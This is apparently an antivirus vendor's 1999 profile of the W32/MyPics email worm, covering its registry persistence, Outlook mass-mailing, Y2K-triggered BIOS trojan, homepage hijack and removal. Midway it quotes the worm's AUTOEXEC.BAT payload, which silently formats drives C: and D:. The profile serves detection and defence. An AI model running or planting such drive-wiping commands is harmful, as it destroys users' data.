W32/MyPics.worm
 
Profile

Name
W32/Mypics.worm

Aliases
I-Worm.Mypics, W32/Mypics.bat, W32/Mypics.com, W32/Mypics.worm

Variants
W32/Mypics.com, W32/Mypics.bat

Date Added
12/2/99

Information
 Discovery Date:11/29/99
 Type:Virus
 SubType:worm
 Risk Assessment:medium
 Minimum DAT:4055
 Minimum Engine:4.0.25

Characteristics
This worm was written in Visual Basic and has a reliance on the library file MSVBVM50.DLL. Without this file, the program will error. This file will copy itself to the local machine and register itself to run from the registry at system startup from either of these locations, depending on if the operating system is Windows 9x or NT:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows\Run

While the file runs as a task in memory, it is performing two functions. One function is to spread via an email routine while the other is a monitor for the system clock to reach January 1st 2000.

This worm uses mass email for distribution, if executed. It appears to use code similar to W97M/Melissa virus to distribute itself using MS Outlook to the first 50 email recipients, however emails created by this worm do not contain a subject line, only the message body of "Here's some pictures for you !" and the email message also has the attached file "Pics4You.exe" with a size of 34,304 bytes.

If the worm is running as a task and detects that the year has changed from 1999 to 2000, this worm writes a .COM file to the local machine in the root of drive C: named "CBIOS.COM". This small file is a trojan which overwrites the checksum value for the BIOS on the local system.

The AUTOEXEC.BAT is also overwritten with these instructions:

ctty nul
format d: /autotest /q /u
format c: /autotest /q /u
c:\cbios.com

Since the AUTOEXEC.BAT startup file is not implemented in Windows NT, this file is never run. After the AUTOEXEC.BAT modification, the user's home page is reset to point to the following web location: http://www.geocities.com/SiliconValley/Vista/8279/index.html

Reset your browser home page manually to correct this.

In AVERT testing on a standard Windows 95 system, if the system date is already beyond January 1, 2000 when this worm is initially installed, the damaging payload is not exhibited.

Both the BAT and COM files are detected as "W32/Mypics.bat" and "W32/Mypics.com" respectively.

Symptoms
Existence of this file on the local system - modifications to the system registry as mentioned above - mass mailings as mentioned above.

Method Of Infection
Running the executable will directly copy itself and run the mass mailing routine.

EXTRA Drivers
VirusScan 4 with the 4.0.25 engine (and above) download here.
Dr. Solomon's AVTK 7.95 (and above) download here.
There is no detection for VirusScan 3.

Removal Instructions
Use current engine and DAT files for detection and removal.